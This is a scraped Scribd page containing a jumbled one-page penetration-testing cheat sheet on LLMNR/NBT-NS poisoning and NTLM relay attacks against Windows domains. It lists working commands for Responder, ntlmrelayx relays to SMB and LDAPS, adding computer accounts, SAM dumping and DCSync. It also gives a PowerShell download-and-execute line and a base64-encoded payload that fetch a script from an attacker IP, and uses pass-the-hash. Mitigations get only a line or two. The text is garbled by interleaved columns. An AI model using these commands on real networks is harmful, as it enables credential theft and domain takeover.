Scribd Logo
Upload

Welcome to Scribd!

  • 2 - LLMNRNBT-NS Poisoning With Out Creds

    Uploaded by

    abdelrahem
    30 views1 page
    The document discusses LLMNR/NBT-NS poisoning attacks using tools like responder and ntlmrelayx. It provides steps to perform SMB and LDAP relays including checking SMB signing, running responder to capture NTLMv2 hashes, relaying hashes with ntlmrelayx, and using hashes for password cracking, machine or user account creation, or dumping SAM files. Mitigation strategies mentioned are enabling SMB signing or disabling LLMNR for LDAP relays.

    Original Description:

    2_LLMNRNBT-NS Poisoning With Out Creds

    Original Title

    2_LLMNRNBT-NS Poisoning With Out Creds

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    The document discusses LLMNR/NBT-NS poisoning attacks using tools like responder and ntlmrelayx. It provides steps to perform SMB and LDAP relays including checking SMB signing, running responder to capture NTLMv2 hashes, relaying hashes with ntlmrelayx, and using hashes for password cracking, machine or user account creation, or dumping SAM files. Mitigation strategies mentioned are enabling SMB signing or disabling LLMNR for LDAP relays.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    30 views1 page

    2 - LLMNRNBT-NS Poisoning With Out Creds

    Uploaded by

    abdelrahem
    The document discusses LLMNR/NBT-NS poisoning attacks using tools like responder and ntlmrelayx. It provides steps to perform SMB and LDAP relays including checking SMB signing, running responder to capture NTLMv2 hashes, relaying hashes with ntlmrelayx, and using hashes for password cracking, machine or user account creation, or dumping SAM files. Mitigation strategies mentioned are enabling SMB signing or disabling LLMNR for LDAP relays.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    of 1

    LLMNR/NBT-NS Poisoning

    Responder

    Enable SMB in Config File NTLM v2 sudo responder -I eth0 -v

    Crackable UnCrackable

    John Hashcat SMB Relay LDAP Relay

    After Crack NTLM v2 we will find username:password we can use it For Gain Access
    or Dump SAM File by secretsdump.py 1.Check SMB Signing 2. Disable SMB From Responder 3. Run responder to perform LLMNR/NBT-NS poisoning 4. Run ntlmrelayx.py that will relay the NTLMv2 hashes to the target 5. Mitigation In smb relay must user be admin in two machine High Perm : Create users account Low Perm : Create machine Account
    machine

    sudo nmap --script=smb2-security-mode 20.20.20.20 -p445 crackmapexec smb 20.20.20/24 --gen-relay-list /tmp/targets.txt Relay to SMB Mitigation by enabling SMB Signing Verify By HMAC Key sudo python3 /opt/impacket/examples/ntlmrelayx.py -t ldaps://secmeter- sudo python3 /opt/impacket/examples/ntlmrelayx.py -t ldaps://secmeter-
    sudo /opt/impacket/examples/ntlmrelayx.py -smb2support -t 20.20.20.20 ntlmrelayx -tf unsigin_device.txt -smb2support -c "whoami" ntlmrelayx reverse shell PTH dc01.secmeter.local -smb2support --remove-mic dc01.secmeter.local -smb2support --remove-mic --add-computer

    Now we can Perform DCSYNC "secretsdump" or Gain access we can use this accounts For enum
    unsigin_device.txt : NO.Of device that will redirect NTLM v2 hash For it to get payload : IEX (New-Object Net.WebClient).DownloadString('http://192.X.X.X/ ntlmrelayx -tf unsigin_device.txt -smb2support -loot : dump hashs from sam
    NTLM v1 this device must be don't enable assigning Sherlock.ps1') or
    IEX (New-Object Net.WebClient).DownloadString('http://192.X.X.X/ To mitigate LDAP Relay disable LLMNR
    Sherlock.txt') then encode payload by : https://raikia.com/tool-powershell-
    encoder/ can send command by ntlmrelayx unsigin_device.txt : NO.Of device that will redirect NTLM v2 hash For it to get NTLM
    v1 this device must be don't enable assigning

    ntlmrelayx -tf unsigin_device.txt -smb2support -c "powershell.exe -exec


    bypass -enc check if "user:pass" exiecuted in any machines : crackmapexec smb
    SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFc 192.168.1.0/24 -u win10_2_user -H 123434412567568768745 -x whoami
    AZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0
    AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgBYAC4AWA
    AuAFgALwBTAGgAZQByAGwAbwBjAGsALgB0AHgAdAAnACkA"

    after user call unknown share file command will executed

    After Find NTLM v1 we can make PTH by evil-winrm

    You might also like